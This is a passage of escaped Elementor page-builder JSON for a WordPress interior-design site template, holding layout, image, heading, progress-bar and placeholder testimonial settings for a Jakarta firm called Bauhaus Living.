right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure 